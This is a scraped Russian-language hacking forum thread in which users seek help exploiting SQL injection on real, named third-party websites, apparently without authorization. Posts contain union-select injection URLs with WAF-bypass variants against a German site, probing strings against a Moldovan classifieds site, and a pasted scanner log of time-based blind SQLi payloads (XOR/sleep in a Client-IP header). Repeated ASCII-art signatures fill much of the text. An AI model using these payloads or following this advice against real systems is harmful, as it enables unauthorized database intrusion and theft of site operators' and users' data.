не работает. waf не modsecurity,другой самопис фильтр похоже по маске ищет select в запросе т.е даже так sdbdnbpselect не работает
помогите ваф обойти Code: http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
Если только WAF беспокоит, то: Code: http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+select(wafbypass),2,3,4,5,6,7,8,9,10,11,12,13,14+--+ http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+and+union+select,1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
ваф срабатывает, по этому не полный запрос) при чём ваф работает когда запрос выполняется без ошибок, даже если в конце убрать --
^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
Файловый кеш сервера + метка модификации файла не меняется. Либо не на тот сервак правки вносите, такое тоже бывает)
^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
Привет помогите раскрутить https://makler.md/ru/an/search/?query=\" Ошибка https://makler.md/ru/an/search/?query=\"" Нет Oшибке https://makler.md/ru/an/search/?query=\"+/* Другая Ошибка Многое намекает на инъекцию правда не понятно как начать раскрутку
^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
Сканирую сканером сайт. Сегодня акунетикс выдал такой лог Code: The vulnerability affects http://www.site.com/login.php , Client-IP Discovered by /Scripts/PerScheme/Blind_Sql_Injection.script Attack details HTTP Header input Client-IP was set to 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z Tests performed: 0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.943 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.737 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.765 0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z => 9.925 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.727 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.741 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.756 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.85 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.718 HTTP request GET /login.php HTTP/1.1 Referer: https://www.google.com/search?hl=en&q=testing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Client-IP: 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z Пишет Blind SQL. Как крутить такое?